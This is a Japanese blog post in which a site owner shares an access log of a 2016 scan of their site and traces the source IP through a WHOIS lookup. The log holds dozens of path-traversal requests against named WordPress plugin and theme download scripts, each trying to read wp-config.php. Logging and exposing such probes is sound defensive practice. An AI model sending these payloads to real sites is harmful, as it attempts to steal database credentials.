Webページに怪しいアクセスが発生するのは毎度のことなので、ログ解析に邪魔な場合は、IPアドレスレンジ丸ごとファイヤーウォールでブロックしています。
本日も以下のような毎度の迷惑アクセスが発生していました。左から、行番号(ログには含まれない)、タイムスタンプ、IPアドレス、URL、リファラの順。
557 [21/Aug/2016:04:55:29] - - 138.91.157.231 "GET //wp-admin/admin-ajax.php?action=revslider_show_image&img=../wp-config.php HTTP/1.1" 404 1041 "-" 558 [21/Aug/2016:04:55:30] - - 138.91.157.231 "GET //wp-admin/admin-ajax.php?action=revolution-slider_show_image&img=../wp-config.php HTTP/1.1" 404 1041 "-" 559 [21/Aug/2016:04:55:30] - - 138.91.157.231 "GET //wp-content/plugins/contus-video-gallery/hdflvplayer/download.php?f=../../../../wp-config.php HTTP/1.1" 404 1041 "-" 560 [21/Aug/2016:04:55:31] - - 138.91.157.231 "GET //wp-content/themes/TheLoft/download.php?file=../../../wp-config.php HTTP/1.1" 404 1041 "-" 561 [21/Aug/2016:04:55:32] - - 138.91.157.231 "GET //wp-content/themes/MichaelCanthony/download.php?file=../../../wp-config.php HTTP/1.1" 404 1041 "-" 562 [21/Aug/2016:04:55:32] - - 138.91.157.231 "GET //wp-content/themes/felis/download.php?file=../wp-config.php HTTP/1.1" 404 1041 "-" 563 [21/Aug/2016:04:55:33] - - 138.91.157.231 "GET //wp-content/themes/epic/includes/download.php?file=wp-config.php HTTP/1.1" 404 1041 "-" 564 [21/Aug/2016:04:55:33] - - 138.91.157.231 "GET //wp-content/themes/trinity/lib/scripts/download.php?file=../../../../../wp-config.php HTTP/1.1" 404 1041 "-" 565 [21/Aug/2016:04:55:34] - - 138.91.157.231 "GET //wp-content/themes/antioch/lib/scripts/download.php?file=../../../../../wp-config.php HTTP/1.1" 404 1041 "-" 566 [21/Aug/2016:04:55:34] - - 138.91.157.231 "GET //wp-content/themes/urbancity/lib/scripts/download.php?file=../../../../../wp-config.php HTTP/1.1" 404 1041 "-" 567 [21/Aug/2016:04:55:35] - - 138.91.157.231 "GET //wp-content/themes/authentic/includes/download.php?file=../../../../wp-config.php HTTP/1.1" 404 1041 "-" 568 [21/Aug/2016:04:55:35] - - 138.91.157.231 "GET //wp-content/themes/churchope/lib/downloadlink.php?file=../../../../wp-config.php HTTP/1.1" 404 1041 "-" 569 [21/Aug/2016:04:55:36] - - 138.91.157.231 "GET //wp-content/themes/linenity/functions/download.php?imgurl=../../../../wp-config.php HTTP/1.1" 404 1041 "-" 570 [21/Aug/2016:04:55:36] - - 138.91.157.231 "GET //wp-content/themes/lote27/download.php?download=../../../wp-config.php HTTP/1.1" 404 1041 "-" 571 [21/Aug/2016:04:55:36] - - 138.91.157.231 "GET //wp-content/themes/mTheme-Unus/css/css.php?files=../../../../wp-config.php HTTP/1.1" 404 1041 "-" 572 [21/Aug/2016:04:55:37] - - 138.91.157.231 "GET //wp-content/plugins/ajax-store-locator-wordpress_0/sl_file_download.php?download_file=../../../wp-config.php HTTP/1.1" 404 1041 "-" 573 [21/Aug/2016:04:55:37] - - 138.91.157.231 "GET //wp-content/plugins/justified-image-grid/download.php?file=file:///C:/wamp/www/wp-config.php HTTP/1.1" 404 1041 "-" 574 [21/Aug/2016:04:55:38] - - 138.91.157.231 "GET //wp-content/plugins/justified-image-grid/download.php?file=file:///C:/xampp/htdocs/wp-config.php HTTP/1.1" 404 1041 "-" 575 [21/Aug/2016:04:55:39] - - 138.91.157.231 "GET //wp-content/plugins/history-collection/download.php?var=../../../wp-config.php HTTP/1.1" 404 1041 "-" 576 [21/Aug/2016:04:55:39] - - 138.91.157.231 "GET //wp-content/plugins/justified-image-grid/download.php?file=file:///var/www/wp-config.php HTTP/1.1" 404 1041 "-" 577 [21/Aug/2016:04:55:39] - - 138.91.157.231 "GET //wp-content/themes/acento/includes/view-pdf.php?download=1&file=/path/wp-config.php HTTP/1.1" 404 1041 "-" 578 [21/Aug/2016:04:55:40] - - 138.91.157.231 "GET //wp-content/force-download.php?file=../wp-config.php HTTP/1.1" 404 1041 "-" 579 [21/Aug/2016:04:55:40] - - 138.91.157.231 "GET //wp-content/plugins/ibs-mappro/lib/download.php?file=../../../../wp-config.php HTTP/1.1" 404 1041 "-" 580 [21/Aug/2016:04:55:40] - - 138.91.157.231 "GET //wp-content/themes/SMWF/inc/download.php?file=../wp-config.php HTTP/1.1" 404 1041 "-" 581 [21/Aug/2016:04:55:41] - - 138.91.157.231 "GET //force-download.php?file=../wp-config.php HTTP/1.1" 404 1041 "-" 582 [21/Aug/2016:04:55:41] - - 138.91.157.231 "GET //wp-admin/admin.php?page=miwoftp&option=com_miwoftp&action=download&dir=/&item=wp-config.php&order=name&sr HTTP/1.1" 404 1041 "-" 583 [21/Aug/2016:04:55:41] - - 138.91.157.231 "GET //wp-content/plugins/s3bubble-amazon-s3-html-5-video-with-adverts/assets/plugins/ultimate/content/downloader.php?path=../../../../../../../wp-config.php HTTP/1.1" 404 1041 "-" 584 [21/Aug/2016:04:55:42] - - 138.91.157.231 "GET //wp-content/themes/markant/download.php?file=../../wp-config.php HTTP/1.1" 404 1041 "-" 585 [21/Aug/2016:04:55:42] - - 138.91.157.231 "GET //wp-content/themes/yakimabait/download.php?file=./wp-config.php HTTP/1.1" 404 1041 "-" 586 [21/Aug/2016:04:55:43] - - 138.91.157.231 "GET /notes/2012/12/02/wordpress-xmlrpc-php-post-access//wp-admin/admin-ajax.php?action=revslider_show_image&img=../wp-config.php HTTP/1.1" 301 - "-" 587 [21/Aug/2016:04:55:47] - - 138.91.157.231 "GET /notes/2012/12/02/wordpress-xmlrpc-php-post-access/wp-admin/admin-ajax.php?action=revslider_show_image&img=../wp-config.php HTTP/1.1" 404 50776 "-" 588 [21/Aug/2016:04:55:52] - - 138.91.157.231 "GET /notes/2012/12/02/wordpress-xmlrpc-php-post-access//wp-admin/admin-ajax.php?action=revolution-slider_show_image&img=../wp-config.php HTTP/1.1" 301 - "-" 589 [21/Aug/2016:04:55:55] - - 138.91.157.231 "GET /notes/2012/12/02/wordpress-xmlrpc-php-post-access/wp-admin/admin-ajax.php?action=revolution-slider_show_image&img=../wp-config.php HTTP/1.1" 404 50776 "-" 590 [21/Aug/2016:04:55:59] - - 138.91.157.231 "GET /notes/2012/12/02/wordpress-xmlrpc-php-post-access//wp-content/plugins/contus-video-gallery/hdflvplayer/download.php?f=../../../../wp-config.php HTTP/1.1" 301 - "-" 591 [21/Aug/2016:04:56:01] - - 138.91.157.231 "GET /notes/2012/12/02/wordpress-xmlrpc-php-post-access/wp-content/plugins/contus-video-gallery/hdflvplayer/download.php?f=../../../../wp-config.php HTTP/1.1" 404 50776 "-" 592 [21/Aug/2016:04:56:05] - - 138.91.157.231 "GET /notes/2012/12/02/wordpress-xmlrpc-php-post-access//wp-content/themes/TheLoft/download.php?file=../../../wp-config.php HTTP/1.1" 301 - "-" 593 [21/Aug/2016:04:56:07] - - 138.91.157.231 "GET /notes/2012/12/02/wordpress-xmlrpc-php-post-access/wp-content/themes/TheLoft/download.php?file=../../../wp-config.php HTTP/1.1" 404 50776 "-" 594 [21/Aug/2016:04:56:12] - - 138.91.157.231 "GET /notes/2012/12/02/wordpress-xmlrpc-php-post-access//wp-content/themes/felis/download.php?file=../wp-config.php HTTP/1.1" 301 - "-" 595 [21/Aug/2016:04:56:14] - - 138.91.157.231 "GET /notes/2012/12/02/wordpress-xmlrpc-php-post-access/wp-content/themes/felis/download.php?file=../wp-config.php HTTP/1.1" 404 50776 "-" 596 [21/Aug/2016:04:56:18] - - 138.91.157.231 "GET /notes/2012/12/02/wordpress-xmlrpc-php-post-access//wp-content/themes/MichaelCanthony/download.php?file=../../../wp-config.php HTTP/1.1" 301 - "-" 597 [21/Aug/2016:04:56:21] - - 138.91.157.231 "GET /notes/2012/12/02/wordpress-xmlrpc-php-post-access/wp-content/themes/MichaelCanthony/download.php?file=../../../wp-config.php HTTP/1.1" 404 50776 "-" 598 [21/Aug/2016:04:56:25] - - 138.91.157.231 "GET /notes/2012/12/02/wordpress-xmlrpc-php-post-access//wp-content/themes/trinity/lib/scripts/download.php?file=../../../../../wp-config.php HTTP/1.1" 301 - "-" 599 [21/Aug/2016:04:56:27] - - 138.91.157.231 "GET /notes/2012/12/02/wordpress-xmlrpc-php-post-access/wp-content/themes/trinity/lib/scripts/download.php?file=../../../../../wp-config.php HTTP/1.1" 404 50776 "-" 600 [21/Aug/2016:04:56:31] - - 138.91.157.231 "GET /notes/2012/12/02/wordpress-xmlrpc-php-post-access//wp-content/themes/epic/includes/download.php?file=wp-config.php HTTP/1.1" 301 - "-" 601 [21/Aug/2016:04:56:33] - - 138.91.157.231 "GET /notes/2012/12/02/wordpress-xmlrpc-php-post-access/wp-content/themes/epic/includes/download.php?file=wp-config.php HTTP/1.1" 404 50776 "-" 602 [21/Aug/2016:04:56:45] - - 138.91.157.231 "GET /notes/2012/12/02/wordpress-xmlrpc-php-post-access//wp-content/themes/urbancity/lib/scripts/download.php?file=../../../../../wp-config.php HTTP/1.1" 301 - "-" 603 [21/Aug/2016:04:56:47] - - 138.91.157.231 "GET /notes/2012/12/02/wordpress-xmlrpc-php-post-access/wp-content/themes/urbancity/lib/scripts/download.php?file=../../../../../wp-config.php HTTP/1.1" 404 50776 "-" 604 [21/Aug/2016:04:56:51] - - 138.91.157.231 "GET /notes/2012/12/02/wordpress-xmlrpc-php-post-access//wp-content/themes/antioch/lib/scripts/download.php?file=../../../../../wp-config.php HTTP/1.1" 301 - "-" 605 [21/Aug/2016:04:56:54] - - 138.91.157.231 "GET /notes/2012/12/02/wordpress-xmlrpc-php-post-access/wp-content/themes/antioch/lib/scripts/download.php?file=../../../../../wp-config.php HTTP/1.1" 404 50776 "-" 606 [21/Aug/2016:04:56:58] - - 138.91.157.231 "GET /notes/2012/12/02/wordpress-xmlrpc-php-post-access//wp-content/themes/authentic/includes/download.php?file=../../../../wp-config.php HTTP/1.1" 301 - "-" 607 [21/Aug/2016:04:57:00] - - 138.91.157.231 "GET /notes/2012/12/02/wordpress-xmlrpc-php-post-access/wp-content/themes/authentic/includes/download.php?file=../../../../wp-config.php HTTP/1.1" 404 50776 "-" 608 [21/Aug/2016:04:57:09] - - 138.91.157.231 "GET /notes/2012/12/02/wordpress-xmlrpc-php-post-access//wp-content/themes/churchope/lib/downloadlink.php?file=../../../../wp-config.php HTTP/1.1" 301 - "-" 609 [21/Aug/2016:04:57:11] - - 138.91.157.231 "GET /notes/2012/12/02/wordpress-xmlrpc-php-post-access/wp-content/themes/churchope/lib/downloadlink.php?file=../../../../wp-config.php HTTP/1.1" 404 50776 "-" 610 [21/Aug/2016:04:57:15] - - 138.91.157.231 "GET /notes/2012/12/02/wordpress-xmlrpc-php-post-access//wp-content/themes/lote27/download.php?download=../../../wp-config.php HTTP/1.1" 301 - "-" 611 [21/Aug/2016:04:57:18] - - 138.91.157.231 "GET /notes/2012/12/02/wordpress-xmlrpc-php-post-access/wp-content/themes/lote27/download.php?download=../../../wp-config.php HTTP/1.1" 404 50776 "-" 612 [21/Aug/2016:04:57:22] - - 138.91.157.231 "GET /notes/2012/12/02/wordpress-xmlrpc-php-post-access//wp-content/themes/mTheme-Unus/css/css.php?files=../../../../wp-config.php HTTP/1.1" 301 - "-" 613 [21/Aug/2016:04:57:24] - - 138.91.157.231 "GET /notes/2012/12/02/wordpress-xmlrpc-php-post-access/wp-content/themes/mTheme-Unus/css/css.php?files=../../../../wp-config.php HTTP/1.1" 404 50776 "-" 614 [21/Aug/2016:04:57:28] - - 138.91.157.231 "GET /notes/2012/12/02/wordpress-xmlrpc-php-post-access//wp-content/themes/linenity/functions/download.php?imgurl=../../../../wp-config.php HTTP/1.1" 301 - "-" 615 [21/Aug/2016:04:57:31] - - 138.91.157.231 "GET /notes/2012/12/02/wordpress-xmlrpc-php-post-access/wp-content/themes/linenity/functions/download.php?imgurl=../../../../wp-config.php HTTP/1.1" 404 50776 "-" 616 [21/Aug/2016:04:57:35] - - 138.91.157.231 "GET /notes/2012/12/02/wordpress-xmlrpc-php-post-access//wp-content/plugins/ajax-store-locator-wordpress_0/sl_file_download.php?download_file=../../../wp-config.php HTTP/1.1" 301 - "-" 617 [21/Aug/2016:04:57:37] - - 138.91.157.231 "GET /notes/2012/12/02/wordpress-xmlrpc-php-post-access/wp-content/plugins/ajax-store-locator-wordpress_0/sl_file_download.php?download_file=../../../wp-config.php HTTP/1.1" 404 50776 "-" 618 [21/Aug/2016:04:57:41] - - 138.91.157.231 "GET /notes/2012/12/02/wordpress-xmlrpc-php-post-access//wp-content/plugins/justified-image-grid/download.php?file=file:///C:/wamp/www/wp-config.php HTTP/1.1" 301 - "-" 619 [21/Aug/2016:04:57:46] - - 138.91.157.231 "GET /notes/2012/12/02/wordpress-xmlrpc-php-post-access/wp-content/plugins/justified-image-grid/download.php?file=file:///C:/wamp/www/wp-config.php HTTP/1.1" 404 50776 "-" 620 [21/Aug/2016:04:57:50] - - 138.91.157.231 "GET /notes/2012/12/02/wordpress-xmlrpc-php-post-access//wp-content/plugins/justified-image-grid/download.php?file=file:///C:/xampp/htdocs/wp-config.php HTTP/1.1" 301 - "-" 621 [21/Aug/2016:04:57:52] - - 138.91.157.231 "GET /notes/2012/12/02/wordpress-xmlrpc-php-post-access/wp-content/plugins/justified-image-grid/download.php?file=file:///C:/xampp/htdocs/wp-config.php HTTP/1.1" 404 50776 "-" 622 [21/Aug/2016:04:57:56] - - 138.91.157.231 "GET /notes/2012/12/02/wordpress-xmlrpc-php-post-access//wp-content/plugins/justified-image-grid/download.php?file=file:///var/www/wp-config.php HTTP/1.1" 301 - "-" 623 [21/Aug/2016:04:57:59] - - 138.91.157.231 "GET /notes/2012/12/02/wordpress-xmlrpc-php-post-access/wp-content/plugins/justified-image-grid/download.php?file=file:///var/www/wp-config.php HTTP/1.1" 404 50776 "-" 624 [21/Aug/2016:04:58:03] - - 138.91.157.231 "GET /notes/2012/12/02/wordpress-xmlrpc-php-post-access//wp-content/themes/acento/includes/view-pdf.php?download=1&file=/path/wp-config.php HTTP/1.1" 301 - "-" 625 [21/Aug/2016:04:58:05] - - 138.91.157.231 "GET /notes/2012/12/02/wordpress-xmlrpc-php-post-access/wp-content/themes/acento/includes/view-pdf.php?download=1&file=/path/wp-config.php HTTP/1.1" 404 50776 "-" 626 [21/Aug/2016:04:58:09] - - 138.91.157.231 "GET /notes/2012/12/02/wordpress-xmlrpc-php-post-access//wp-content/plugins/history-collection/download.php?var=../../../wp-config.php HTTP/1.1" 301 - "-" 627 [21/Aug/2016:04:58:12] - - 138.91.157.231 "GET /notes/2012/12/02/wordpress-xmlrpc-php-post-access/wp-content/plugins/history-collection/download.php?var=../../../wp-config.php HTTP/1.1" 404 50776 "-" 628 [21/Aug/2016:04:58:15] - - 138.91.157.231 "GET /notes/2012/12/02/wordpress-xmlrpc-php-post-access//wp-content/themes/SMWF/inc/download.php?file=../wp-config.php HTTP/1.1" 301 - "-" 629 [21/Aug/2016:04:58:18] - - 138.91.157.231 "GET /notes/2012/12/02/wordpress-xmlrpc-php-post-access/wp-content/themes/SMWF/inc/download.php?file=../wp-config.php HTTP/1.1" 404 50776 "-" 630 [21/Aug/2016:04:58:22] - - 138.91.157.231 "GET /notes/2012/12/02/wordpress-xmlrpc-php-post-access//wp-content/force-download.php?file=../wp-config.php HTTP/1.1" 301 - "-" 631 [21/Aug/2016:04:58:24] - - 138.91.157.231 "GET /notes/2012/12/02/wordpress-xmlrpc-php-post-access/wp-content/force-download.php?file=../wp-config.php HTTP/1.1" 404 50776 "-" 632 [21/Aug/2016:04:58:28] - - 138.91.157.231 "GET /notes/2012/12/02/wordpress-xmlrpc-php-post-access//wp-content/plugins/ibs-mappro/lib/download.php?file=../../../../wp-config.php HTTP/1.1" 301 - "-" 633 [21/Aug/2016:04:58:31] - - 138.91.157.231 "GET /notes/2012/12/02/wordpress-xmlrpc-php-post-access/wp-content/plugins/ibs-mappro/lib/download.php?file=../../../../wp-config.php HTTP/1.1" 404 50776 "-" 634 [21/Aug/2016:04:58:35] - - 138.91.157.231 "GET /notes/2012/12/02/wordpress-xmlrpc-php-post-access//force-download.php?file=../wp-config.php HTTP/1.1" 301 - "-" 635 [21/Aug/2016:04:58:43] - - 138.91.157.231 "GET /notes/2012/12/02/wordpress-xmlrpc-php-post-access/force-download.php?file=../wp-config.php HTTP/1.1" 404 50776 "-" 636 [21/Aug/2016:04:58:48] - - 138.91.157.231 "GET /notes/2012/12/02/wordpress-xmlrpc-php-post-access//wp-admin/admin.php?page=miwoftp&option=com_miwoftp&action=download&dir=/&item=wp-config.php&order=name&sr HTTP/1.1" 301 - "-" 637 [21/Aug/2016:04:58:51] - - 138.91.157.231 "GET /notes/2012/12/02/wordpress-xmlrpc-php-post-access/wp-admin/admin.php?page=miwoftp&option=com_miwoftp&action=download&dir=/&item=wp-config.php&order=name&sr HTTP/1.1" 404 50776 "-" 638 [21/Aug/2016:04:58:55] - - 138.91.157.231 "GET /notes/2012/12/02/wordpress-xmlrpc-php-post-access//wp-content/plugins/s3bubble-amazon-s3-html-5-video-with-adverts/assets/plugins/ultimate/content/downloader.php?path=../../../../../../../wp-config.php HTTP/1.1" 301 - "-" 639 [21/Aug/2016:04:58:57] - - 138.91.157.231 "GET /notes/2012/12/02/wordpress-xmlrpc-php-post-access/wp-content/plugins/s3bubble-amazon-s3-html-5-video-with-adverts/assets/plugins/ultimate/content/downloader.php?path=../../../../../../../wp-config.php HTTP/1.1" 404 50776 "-" 640 [21/Aug/2016:04:59:02] - - 138.91.157.231 "GET /notes/2012/12/02/wordpress-xmlrpc-php-post-access//wp-content/themes/markant/download.php?file=../../wp-config.php HTTP/1.1" 301 - "-" 641 [21/Aug/2016:04:59:05] - - 138.91.157.231 "GET /notes/2012/12/02/wordpress-xmlrpc-php-post-access/wp-content/themes/markant/download.php?file=../../wp-config.php HTTP/1.1" 404 50776 "-" 642 [21/Aug/2016:04:59:09] - - 138.91.157.231 "GET /notes/2012/12/02/wordpress-xmlrpc-php-post-access//wp-content/themes/yakimabait/download.php?file=./wp-config.php HTTP/1.1" 301 - "-" 643 [21/Aug/2016:04:59:11] - - 138.91.157.231 "GET /notes/2012/12/02/wordpress-xmlrpc-php-post-access/wp-content/themes/yakimabait/download.php?file=./wp-config.php HTTP/1.1" 404 50776 "-"
この「138.91.157.231」がどこの国のIPなのかを調べてみると・・・・
NetRange: 138.91.0.0 - 138.91.255.255 CIDR: 138.91.0.0/16 NetName: MICROSOFT NetHandle: NET-138-91-0-0-1 Parent: NET138 (NET-138-0-0-0-0) NetType: Direct Assignment OriginAS: Organization: Microsoft Corp (MSFT-Z) RegDate: 2011-06-22 Updated: 2013-08-20 Ref: https://whois.arin.net/rest/net/NET-138-91-0-0-1
マイクロソフトでした。
マイクロソフトが企業としてこんな事しているとは思いませんけど、中にはこういう事をする奴がいるわけです。IPアドレスレンジを貸与している関連の企業や顧客かもしれませんけどね。
abuse へ連絡しようかとも考えましたけど、こういう企業は Thank you の一言も返信してこないのが常なので、レポートはパス。ここで、さらすだけにします。